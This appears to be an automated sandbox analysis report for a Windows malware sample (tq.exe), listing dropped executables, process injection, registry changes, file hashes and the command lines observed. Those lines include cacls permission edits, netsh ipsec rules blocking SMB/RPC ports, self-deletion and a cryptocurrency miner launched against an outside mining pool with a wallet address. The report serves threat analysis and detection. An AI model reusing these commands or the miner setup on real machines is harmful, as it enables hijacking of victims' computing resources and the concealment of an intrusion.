0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15

Analysis

max time kernel
123s
max time network
148s
platform
windows7_x64
resource
win7v20210410
submitted
07-05-2021 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tq.exe
Size

418KB
MD5

e8450e61f061fd90d74507eb04845ecd
SHA1

f344f20c57f9cb01ea3166f3404336da1519a832
SHA256

0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
SHA512

d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91

Score

8^/10

persistence upx

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exe

pid process

852 MS19.exe
1680 MS20.exe
580 MSSQLH.exe
276
1104 RunDllExe.exe
604 RunDllExe.exe
1988 x64.exe
1064 wudfhosts.exe
Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
852	MS19.exe
1680	MS20.exe
580	MSSQLH.exe
276
1104	RunDllExe.exe
604	RunDllExe.exe
1988	x64.exe
1064	wudfhosts.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Windows\Cursors\wudfhosts.exe	upx
C:\Windows\Cursors\WUDFhosts.exe	upx
\Windows\Cursors\WUDFhosts.exe	upx

Loads dropped DLL 10 IoCs

Processes:

tq.exeMSSQLH.exesvchost.exesvchost.exe

pid process

1864 tq.exe
1532
1864 tq.exe
1684
1864 tq.exe
1864 tq.exe
580 MSSQLH.exe
580 MSSQLH.exe
1864 svchost.exe
1532 svchost.exe

pid	process
1864	tq.exe
1532
1864	tq.exe
1684
1864	tq.exe
1864	tq.exe
580	MSSQLH.exe
580	MSSQLH.exe
1864	svchost.exe
1532	svchost.exe

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

RunDllExe.exeRunDllExe.exesvchost.exe

description	pid	process	target process
PID 1104 set thread context of 332	1104	RunDllExe.exe	svchost.exe
PID 604 set thread context of 596	604	RunDllExe.exe	svchost.exe
PID 1864 set thread context of 1532	1864	svchost.exe	svchost.exe

Drops file in Windows directory 18 IoCs

Processes:

RunDllExe.exeRunDllExe.exex64.exeMSSQLH.exesvchost.exe

description	ioc	process
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File created	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\Logs\RunDllExe	MSSQLH.exe
File created	C:\Windows\MpMgSvc.dll	MSSQLH.exe
File created	C:\Windows\Logs\Vers.txt	MSSQLH.exe
File opened for modification	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File created	C:\Windows\Help\active_desktop_render.dll	x64.exe
File opened for modification	C:\Windows\Help\active_desktop_render.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe.exe	MSSQLH.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File created	C:\Windows\Help\active_desktop_render_New.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe.dll	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe

Modifies data under HKEY_USERS 24 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e0cdaec44143d701	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a07000e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e0cdaec44143d701	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

MSSQLH.exesvchost.exe

pid process

580 MSSQLH.exe
1532 svchost.exe
1532 svchost.exe
1532 svchost.exe
1532 svchost.exe
1532 svchost.exe

pid	process
580	MSSQLH.exe
1532	svchost.exe
1532	svchost.exe
1532	svchost.exe
1532	svchost.exe
1532	svchost.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

MS20.exeMSSQLH.exesvchost.exewudfhosts.exe

description	pid	process
Token: SeImpersonatePrivilege	1680	MS20.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	580	MSSQLH.exe
Token: SeBackupPrivilege	580	MSSQLH.exe
Token: SeSecurityPrivilege	580	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	580	MSSQLH.exe
Token: SeRestorePrivilege	1532	svchost.exe
Token: SeBackupPrivilege	1532	svchost.exe
Token: SeSecurityPrivilege	1532	svchost.exe
Token: SeTakeOwnershipPrivilege	1532	svchost.exe
Token: SeLockMemoryPrivilege	1064	wudfhosts.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exe

pid process

1864 tq.exe
580 MSSQLH.exe
1104 RunDllExe.exe
604 RunDllExe.exe
1988 x64.exe
1864 svchost.exe
1532 svchost.exe
1532 svchost.exe

pid	process
1864	tq.exe
580	MSSQLH.exe
1104	RunDllExe.exe
604	RunDllExe.exe
1988	x64.exe
1864	svchost.exe
1532	svchost.exe
1532	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exe

description	pid	process	target process
PID 1864 wrote to memory of 852	1864	tq.exe	MS19.exe
PID 1864 wrote to memory of 852	1864	tq.exe	MS19.exe
PID 1864 wrote to memory of 852	1864	tq.exe	MS19.exe
PID 1864 wrote to memory of 852	1864	tq.exe	MS19.exe
PID 1864 wrote to memory of 1680	1864	tq.exe	MS20.exe
PID 1864 wrote to memory of 1680	1864	tq.exe	MS20.exe
PID 1864 wrote to memory of 1680	1864	tq.exe	MS20.exe
PID 1864 wrote to memory of 1680	1864	tq.exe	MS20.exe
PID 1864 wrote to memory of 580	1864	tq.exe	MSSQLH.exe
PID 1864 wrote to memory of 580	1864	tq.exe	MSSQLH.exe
PID 1864 wrote to memory of 580	1864	tq.exe	MSSQLH.exe
PID 1864 wrote to memory of 580	1864	tq.exe	MSSQLH.exe
PID 580 wrote to memory of 324	580	MSSQLH.exe	cacls.exe
PID 580 wrote to memory of 324	580	MSSQLH.exe	cacls.exe
PID 580 wrote to memory of 324	580	MSSQLH.exe	cacls.exe
PID 580 wrote to memory of 324	580	MSSQLH.exe	cacls.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 1104 wrote to memory of 332	1104	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 604 wrote to memory of 596	604	RunDllExe.exe	svchost.exe
PID 580 wrote to memory of 1988	580	MSSQLH.exe	x64.exe
PID 580 wrote to memory of 1988	580	MSSQLH.exe	x64.exe
PID 580 wrote to memory of 1988	580	MSSQLH.exe	x64.exe
PID 580 wrote to memory of 1988	580	MSSQLH.exe	x64.exe
PID 1988 wrote to memory of 1676	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1676	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1676	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1676	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 572	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 572	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 572	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 572	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 324	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 324	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 324	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 324	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1176	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1176	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1176	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1176	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1444	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1444	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1444	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1444	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1092	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1092	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1092	1988	x64.exe	netsh.exe
PID 1988 wrote to memory of 1092	1988	x64.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\tq.exe
"C:\Users\Admin\AppData\Local\Temp\tq.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1864

C:\Users\Admin\AppData\Local\Temp\MS19.exe
C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
2⤵
- Executes dropped EXE
PID:852

C:\Users\Admin\AppData\Local\Temp\MS20.exe
C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\*.exe /e /d system
3⤵
PID:324

C:\Users\Admin\AppData\Local\Temp\x64.exe
x64.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
4⤵
PID:1676

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
4⤵
PID:572

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
4⤵
PID:324

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
4⤵
PID:1176

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
4⤵
PID:1444

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
4⤵
PID:1092

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
4⤵
PID:2000

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
4⤵
PID:1868

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
4⤵
PID:1016

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
4⤵
PID:1104

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
4⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"
4⤵
PID:1284

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:332

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:596

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1864

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1532

C:\Windows\Cursors\wudfhosts.exe
C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1064

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Cursors\wudfhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Logs\RunDllExe
MD5
3b2bdaf477b27e6d0f7f1311e3d68764

SHA1
9fb60c5b1bf55891aeccef2ccd503b2558d05de1

SHA256
b3fbb8197e3b63aaf4fffa06bd797e8fe8c52c5f03af3f832ee391b21bc304c3

SHA512
23163f06ce9f53c30651e0f70f1964cb0b5d3bad3b0317e9fd36a7a85088e23b549aa240c1da5cfba1635cbad8966397d7d4f740b13f46982f4e79c178408299

Download Submit
C:\Windows\Logs\RunDllExe
MD5
3b2bdaf477b27e6d0f7f1311e3d68764

SHA1
9fb60c5b1bf55891aeccef2ccd503b2558d05de1

SHA256
b3fbb8197e3b63aaf4fffa06bd797e8fe8c52c5f03af3f832ee391b21bc304c3

SHA512
23163f06ce9f53c30651e0f70f1964cb0b5d3bad3b0317e9fd36a7a85088e23b549aa240c1da5cfba1635cbad8966397d7d4f740b13f46982f4e79c178408299

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
1a2be7c1e9383a99423d7648874228da

SHA1
44763851cae05055fd22a555333dd20b77e3883a

SHA256
19397f23a9707929b3f621d8f9419146c8c42c07e64c52d682fd6f636ad0c244

SHA512
1858baaa56374ba7ffc274ee851781d2cae717365c13b1efc3f9276878f36bb2d1b4818e5f170bd3096f619e569fda1507d67abfb6a193aa61ac559ee05164c2

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
00ff0cc6b0d9e54b4ce33b95f6c0eaff

SHA1
a1683279dd5db717b0fd61799344ff67db1e591a

SHA256
3a13c88c252d8873a7828186cf40386720a77f8dbe74b62a295223ee36716dc0

SHA512
2fec06212298912bb97e143c583502324f4a9ac4875d82fbde32d8c0fa72e1e6393d5755f372f494fe836a29049a8f0ad99faa13df2242638c4ed13c1a87557a

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
\??\c:\windows\help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

